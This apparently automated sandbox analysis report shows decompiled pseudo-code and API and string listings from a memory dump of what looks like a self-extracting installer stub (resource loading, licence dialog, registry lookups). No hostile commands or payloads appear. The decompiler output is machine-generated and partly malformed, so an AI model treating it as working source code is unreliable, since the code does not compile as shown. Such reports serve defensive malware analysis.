0x00f3330a
0x00f3331a
0x00f3331e
0x00000000
0x00f33324
0x00f33312
0x00000000
0x00000000
0x00f33314
0x00000000
0x00f33314
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00F3331E
GetDesktopWindow.USER32 ref: 00F33328
SetWindowTextA.USER32(?,Umorals4), ref: 00F33340
SetDlgItemTextA.USER32 ref: 00F33352
SetForegroundWindow.USER32(?), ref: 00F33359
EndDialog.USER32(?,00000002), ref: 00F33366

Strings

Umorals4, xrefs: 00F3333A

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: Umorals4
API String ID: 852535152-264535404
Opcode ID: 44c6d5bd33f2a3f40563b52a57b3dc644059dbb116585353b04444147a2a5ea4
Instruction ID: cd1fc1019b9c844c2067131322feeb79a58538e87ae2cfe59a4220963a74ee57
Opcode Fuzzy Hash: 44c6d5bd33f2a3f40563b52a57b3dc644059dbb116585353b04444147a2a5ea4
Instruction Fuzzy Hash: 43017132A44128AFDB15AF69DC4D96E3A56FB49731F00C010F986D61A0CFB4DA01FBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F32755, Relevance: 12.1, APIs: 8, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F32755(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t69;
				void* _t71;
				void* _t74;
				void* _t80;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t100;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t109;

				_v12 = __edx;
				_t99 = __ecx;
				_t105 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t102 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t105 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00F325DB(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + 0x84 + _t99) == 0) {
							goto L20;
						}
						_t69 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t69;
						if(_t69 == 0) {
							_t99 = _v16;
							_t71 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t71 + _t93 + 0x84)) == _t105 &&  *((intOrPtr*)(_t71 + _t93 + 0x88)) == _t105) {
								goto L18;
							}
						} else {
							_t102 = GlobalAlloc(0x42, _t69);
							if(_t102 != 0) {
								_t74 = GlobalLock(_t102);
								_v36 = _t74;
								if(_t74 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t74) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t102);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t80 = _v44;
										_t88 = _t105;
										_v28 =  *((intOrPtr*)(_t80 + 0xc));
										_t100 = _v28;
										_v48 =  *((intOrPtr*)(_t80 + 8));
										_t84 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t84;
										_t108 = _t84;
										do {
											 *((intOrPtr*)(_t109 + _t88 - 0x34)) = E00F328FA(_t84, _t97, _t100,  *((intOrPtr*)(_t108 - 0x10)),  *((intOrPtr*)(_t108 - 0xc)));
											 *((intOrPtr*)(_t109 + _t88 - 0x3c)) = E00F328FA(_t85, _t97, _t100,  *((intOrPtr*)(_t108 - 4)),  *_t108);
											_t108 = _t108 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t105 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t105 || _v60 > _t105) {
												GlobalUnlock(_t102);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t102 != 0) {
					GlobalFree(_t102);
				}
				return _t105;
			}

0x00f3275e
0x00f32761
0x00f32764
0x00f32766
0x00f32769
0x00f3276c
0x00f3276e
0x00f32774
0x00f328ce
0x00f328d0
0x00f3277a
0x00f3277a
0x00f3277c
0x00f3277f
0x00f32787
0x00f327a3
0x00000000
0x00000000
0x00f327b0
0x00f327b6
0x00f327bb
0x00f3289b
0x00f3289e
0x00f328a0
0x00f328a3
0x00f328ad
0x00000000
0x00000000
0x00f327c1
0x00f327ca
0x00f327ce
0x00f327d5
0x00f327db
0x00f327e0
0x00f327f8
0x00f3288c
0x00f3288d
0x00f32893
0x00f328b8
0x00f328bb
0x00f328bc
0x00f328bf
0x00f328c2
0x00f328c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00f3281e
0x00f3281e
0x00f32821
0x00f32829
0x00f3282f
0x00f32838
0x00f32841
0x00f32843
0x00f32846
0x00f32849
0x00f3284b
0x00f32858
0x00f32864
0x00f32868
0x00f3286b
0x00f3286e
0x00f32873
0x00f32876
0x00f3287b
0x00f32885
0x00f328ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f3287b
0x00f327f8
0x00f327e0
0x00f327ce
0x00000000
0x00f327bb
0x00f3277f
0x00f328d1
0x00f328d4
0x00f328d8
0x00f328db
0x00f328db
0x00f328e9

APIs

GlobalFree.KERNEL32 ref: 00F328DB

Part of subcall function 00F325DB: CharUpperA.USER32(FDACA2C3,00000000,00000000,00000000), ref: 00F32610
Part of subcall function 00F325DB: CharNextA.USER32(00000001), ref: 00F3261D
Part of subcall function 00F325DB: CharNextA.USER32(00000000), ref: 00F32624
Part of subcall function 00F325DB: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32691
Part of subcall function 00F325DB: RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,00000000,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326BA
Part of subcall function 00F325DB: ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F326D8
Part of subcall function 00F325DB: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32708

GetFileVersionInfoSizeA.VERSION(00000000,00F3379F,?,00000001,00000000,-00000004,?,?,?,?,?,?,?,?,00F3379F,?), ref: 00F327B0
GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?,?,00000000), ref: 00F327C4
GlobalLock.KERNEL32 ref: 00F327D5
GetFileVersionInfoA.VERSION(00000000,00F3379F,?,00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?), ref: 00F327F0
VerQueryValueA.VERSION(?,00F31214,?,?,?,?,?,?,?,?,?,?,00F3379F,?,?,?), ref: 00F3280E
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F3379F,?,?,?,?,00000000,?), ref: 00F3288D
GlobalUnlock.KERNEL32(00000000,FFFFFFFE,?,?,?), ref: 00F328ED

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
String ID:
API String ID: 1051330783-0
Opcode ID: dc9cd82e7f209d1cf0a036c33a861427c31f1793ef77e4e3fb91d387aa79e825
Instruction ID: 504b910c73375320b20c35ca8d7ff20d0e1a04d5e4567d9c54576c04411861e1
Opcode Fuzzy Hash: dc9cd82e7f209d1cf0a036c33a861427c31f1793ef77e4e3fb91d387aa79e825
Instruction Fuzzy Hash: BD515871E00219EFCB55CF99DC84AAEFBB5FF48720F14406AE905E3221CB319945EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F32922, Relevance: 12.1, APIs: 8, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F32922(CHAR* __ecx, char* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				int _t20;
				char _t31;
				intOrPtr _t33;
				char* _t37;
				char _t41;
				char* _t43;
				CHAR* _t50;
				intOrPtr* _t53;
				CHAR* _t57;
				void* _t60;
				CHAR* _t62;
				CHAR* _t63;
				signed int _t64;

				_t58 = __edx;
				_t15 =  *0xf38000; // 0xfdaca2c3
				_t16 = _t15 ^ _t64;
				_v8 = _t15 ^ _t64;
				_t43 = __edx;
				_t63 = __ecx;
				 *__edx = 0;
				_t62 = __edx;
				if(__ecx != 0 &&  *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xf39164,  &_v268, 0x104);
					while(1) {
						_t16 =  *_t63;
						if(_t16 == 0) {
							break;
						}
						_t20 = IsDBCSLeadByte(_t16);
						 *_t62 =  *_t63;
						if(_t20 != 0) {
							_t62[1] = _t63[1];
						}
						if( *_t63 != 0x23) {
							L20:
							_t62 = CharNextA(_t62);
						} else {
							_t63 = CharNextA(_t63);
							if(CharUpperA( *_t63) != 0x44) {
								if(CharUpperA( *_t63) != 0x45) {
									if( *_t63 == 0x23) {
										goto L20;
									}
								} else {
									E00F31485(_t62, E00F315D1(_t43, _t62),  &_v268);
									_t50 = _t62;
									_t13 =  &(_t50[1]); // 0x1
									_t58 = _t13;
									do {
										_t31 =  *_t50;
										_t50 =  &(_t50[1]);
									} while (_t31 != 0);
									goto L18;
								}
							} else {
								E00F3654A( &_v268);
								_t53 =  &_v268;
								_t60 = _t53 + 1;
								do {
									_t33 =  *_t53;
									_t53 = _t53 + 1;
								} while (_t33 != 0);
								_t37 = CharPrevA( &_v268,  &(( &_v268)[_t53 - _t60]));
								if(_t37 != 0 &&  *_t37 == 0x5c) {
									 *_t37 = 0;
								}
								E00F31485(_t62, E00F315D1(_t43, _t62),  &_v268);
								_t57 = _t62;
								_t11 =  &(_t57[1]); // 0x1
								_t58 = _t11;
								do {
									_t41 =  *_t57;
									_t57 =  &(_t57[1]);
								} while (_t41 != 0);
								L18:
								_t62 =  &(_t62[_t50 - _t58]);
							}
						}
						_t63 = CharNextA(_t63);
					}
					 *_t62 = _t16;
				}
				return E00F36C20(_t16, _t43, _v8 ^ _t64, _t58, _t62, _t63);
			}

0x00f32922
0x00f3292d
0x00f32932
0x00f32934
0x00f32938
0x00f3293b
0x00f3293e
0x00f32941
0x00f32945
0x00f32966
0x00f32a5a
0x00f32a5a
0x00f32a5e
0x00000000
0x00000000
0x00f32972
0x00f3297c
0x00f3297e
0x00f32983
0x00f32983
0x00f32989
0x00f32a48
0x00f32a4f
0x00f3298f
0x00f32996
0x00f329a4
0x00f32a17
0x00f32a46
0x00000000
0x00000000
0x00f32a19
0x00f32a2c
0x00f32a31
0x00f32a33
0x00f32a33
0x00f32a36
0x00f32a36
0x00f32a38
0x00f32a39
0x00000000
0x00f32a36
0x00f329a6
0x00f329ac
0x00f329b1
0x00f329b7
0x00f329ba
0x00f329ba
0x00f329bc
0x00f329bd
0x00f329d3
0x00f329db
0x00f329e2
0x00f329e2
0x00f329f8
0x00f329fd
0x00f329ff
0x00f329ff
0x00f32a02
0x00f32a02
0x00f32a04
0x00f32a05
0x00f32a3d
0x00f32a3f
0x00f32a3f
0x00f329a4
0x00f32a58
0x00f32a58
0x00f32a64
0x00f32a64
0x00f32a76

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F32966
IsDBCSLeadByte.KERNEL32(00000000), ref: 00F32972
CharNextA.USER32(?), ref: 00F32990
CharUpperA.USER32 ref: 00F3299C
CharPrevA.USER32(?,?), ref: 00F329D3
CharNextA.USER32(?), ref: 00F32A52

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 160de19b0ca61d23c26386fbdfb1ba18e53449ca7ff50703dbf3351ed7f11c2d
Instruction ID: d4b47ea4436ba97c22b88a508d8ad4ae67bd6ab59056a9e91e698443e90f9727
Opcode Fuzzy Hash: 160de19b0ca61d23c26386fbdfb1ba18e53449ca7ff50703dbf3351ed7f11c2d
Instruction Fuzzy Hash: 184135749042899FDF75DF348C847BA7BAA9F56330F180199D8C187202DB7A8D86BB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F34239, Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F34239(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v60 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v48 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v56 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v60;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v48 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v56;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00F36C20(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00f34239
0x00f34241
0x00f34248
0x00f3424f
0x00f34255
0x00f3425a
0x00f34269
0x00f3426c
0x00f34274
0x00f34289
0x00f34292
0x00f342a0
0x00f342ad
0x00f342b0
0x00f342b6
0x00f342bd
0x00f342c4
0x00f342c9
0x00f342ca
0x00f342d0
0x00f342d8
0x00f342dc
0x00f342dc
0x00f342cc
0x00f342cc
0x00f342cc
0x00f342e3
0x00f342ea
0x00f342ed
0x00f342f3
0x00f342fb
0x00f342ff
0x00f342ff
0x00f342ef
0x00f342ef
0x00f342ef
0x00f34321

APIs

GetWindowRect.USER32 ref: 00F3425A
GetWindowRect.USER32 ref: 00F34274
GetDC.USER32(?), ref: 00F3428C
GetDeviceCaps.GDI32(00000000,00000008), ref: 00F34297
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F342A3
ReleaseDC.USER32 ref: 00F342B0
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00F3430B

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 5124f2053fe481dad9c1e6d72cc4942145ae56749d28c2cea773143fdd5dfa23
Instruction ID: c61b12e9a758610bbabb1fa0710f9907a064b7c90b97056008ce07d7fb094904
Opcode Fuzzy Hash: 5124f2053fe481dad9c1e6d72cc4942145ae56749d28c2cea773143fdd5dfa23
Instruction Fuzzy Hash: 7D312D72E0021DAFCB14DFB9DD899EEBBB6EB89320F144169F805F3244D670AD059B60

Uniqueness

Uniqueness Score: -1.00%

Function 00F36154, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F36154(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				struct HINSTANCE__* _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v36 = __ecx;
				_v32 = 0;
				_t36 = 1;
				E00F31524( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xf39a88 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xf3a290( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v36();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v32 = _v32 + 1;
							E00F31524( &_v28, 0x14, "UPDFILE%lu", _v32 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00F36C20(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00f36154
0x00f3615c
0x00f36163
0x00f36169
0x00f3616b
0x00f36177
0x00f3617f
0x00f36180
0x00f361f7
0x00f361f7
0x00f36201
0x00f36209
0x00000000
0x00000000
0x00f36196
0x00f3619a
0x00f3621b
0x00f36225
0x00f3619c
0x00f3619c
0x00f3619c
0x00f3619f
0x00f361a1
0x00f361a1
0x00f361a4
0x00f361a4
0x00f361a6
0x00f361a7
0x00f361ab
0x00f361ad
0x00f361af
0x00f361be
0x00f361c4
0x00f361c9
0x00f361d0
0x00f361d0
0x00f361d2
0x00f361d5
0x00f36211
0x00f36213
0x00f361d7
0x00f361d7
0x00f361ed
0x00f361f0
0x00f361f5
0x00000000
0x00f361f5
0x00f361d5
0x00f36227
0x00f36239
0x00f36239
0x00000000

APIs

Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556

LoadResource.KERNEL32(00000000,00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36189
LockResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36190
FreeResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F361D7
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F36201
FreeResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36213

Strings

UPDFILE%lu, xrefs: 00F3616F, 00F361E5

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: b4fbe1cf495bdc621034caffab8916b36d2ffcaee8cd8869718827aa014fdf9c
Instruction ID: fd9356959c0fcf155fe6c7a3239ded36aba582461a04603c482b93c9ba9a010a
Opcode Fuzzy Hash: b4fbe1cf495bdc621034caffab8916b36d2ffcaee8cd8869718827aa014fdf9c
Instruction Fuzzy Hash: 8B21E476A00219ABDB14AF65DC499BFBB79FF44734F004119E942E3201CB358C02ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3671D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F3671D(void* __ebx, signed int* __edx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				int* _v172;
				void* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t21;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t40 = __edx;
				_t36 = __ebx;
				_t19 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t19 ^ _t44;
				_t41 =  *0xf38200; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v172 = 0;
				if(_t41 != 0xfffffffe) {
					L14:
					_t21 = _t41;
				} else {
					 *0xf38200 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L13:
						_t41 =  *0xf38200; // 0xfffffffe
						goto L14;
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v176) != 0) {
							goto L13;
						} else {
							_t31 = RegQueryValueExA(_v176, 0xf31111, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v176);
							if(_t31 == 0) {
								_t40 =  &_v172;
								if(E00F365E5( &_v20,  &_v172) == 0) {
									goto L13;
								} else {
									_t35 = _v172 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xf38200 = _t41;
									} else {
										goto L13;
									}
								}
								goto L14;
							} else {
								_t21 =  *0xf38200; // 0xfffffffe
							}
						}
					}
				}
				return E00F36C20(_t21, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x00f3671d
0x00f3671d
0x00f36728
0x00f3672f
0x00f36734
0x00f3673a
0x00f3673c
0x00f36746
0x00f3674f
0x00f36845
0x00f36845
0x00f36755
0x00f3675b
0x00f36762
0x00f36774
0x00f3683f
0x00f3683f
0x00000000
0x00f3677a
0x00f3677c
0x00f36783
0x00000000
0x00f367d4
0x00f367f2
0x00f367fe
0x00f36800
0x00f36808
0x00f36811
0x00f36821
0x00000000
0x00f36823
0x00f36829
0x00f36830
0x00f36837
0x00000000
0x00000000
0x00000000
0x00f36830
0x00000000
0x00f3680a
0x00f3680a
0x00f3680a
0x00f36808
0x00f36783
0x00f36774
0x00f36856

APIs

GetVersionExA.KERNEL32(?,00000000,?), ref: 00F3676C
GetSystemMetrics.USER32 ref: 00F367A5
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F367CA
RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,?,0000000C), ref: 00F367F2
RegCloseKey.ADVAPI32(?), ref: 00F36800

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00F367C0

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseMetricsOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3077698598-1109908249
Opcode ID: 67b6f43f9e44934d9150721b5615a8d2b17870167fa38ff463b563bf55201974
Instruction ID: df781fbd9f800e1b49f3af3339ccc1fd332c619d33e3b03c2fffa3732a3c7e06
Opcode Fuzzy Hash: 67b6f43f9e44934d9150721b5615a8d2b17870167fa38ff463b563bf55201974
Instruction Fuzzy Hash: 6B318D75E00218EFEB218B11DC04BAAB7B9FF49370F1481A5E948D2150DB309A45EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F33884, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F33884() {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00F34538(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xf39044 = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00F34538(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xf39044, "<None>") == 0) {
							LocalFree( *0xf39044);
							L9:
							 *0xf39a88 = 0;
							return 1;
						}
						_t9 = E00F363E1(_t19, 0x7d1, 0, E00F32FA0, 0, 0);
						LocalFree( *0xf39044);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xf39a88 = 0x800704c7;
						L2:
						return 0;
					}
					E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xf39044);
					 *0xf39a88 = 0x80070714;
					goto L2;
				}
				E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xf39a88 = E00F3613C();
				goto L2;
			}

0x00f3388b
0x00f3389c
0x00f338a2
0x00f338a8
0x00f338af
0x00f338d6
0x00f338df
0x00f3391d
0x00f33958
0x00f3395e
0x00f33960
0x00000000
0x00f33966
0x00f3392c
0x00f33939
0x00f33941
0x00000000
0x00000000
0x00f33943
0x00f338cc
0x00000000
0x00f338cc
0x00f338ed
0x00f338f8
0x00f338fe
0x00000000
0x00f338fe
0x00f338bd
0x00f338c7
0x00000000

APIs

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DF8,00000000,00000001,00000000), ref: 00F338A2
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F338F8

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C

lstrcmpA.KERNEL32(<None>,00000000), ref: 00F33915
LocalFree.KERNEL32 ref: 00F33958

Part of subcall function 00F363E1: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F363F4
Part of subcall function 00F363E1: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000), ref: 00F36402
Part of subcall function 00F363E1: DialogBoxIndirectParamA.USER32 ref: 00F36421
Part of subcall function 00F363E1: FreeResource.KERNEL32(00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000,00000001), ref: 00F3642A

LocalFree.KERNEL32(00000000,00F32FA0,00000000,00000000), ref: 00F33939

Strings

LICENSE, xrefs: 00F3388B
<None>, xrefs: 00F3390A

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

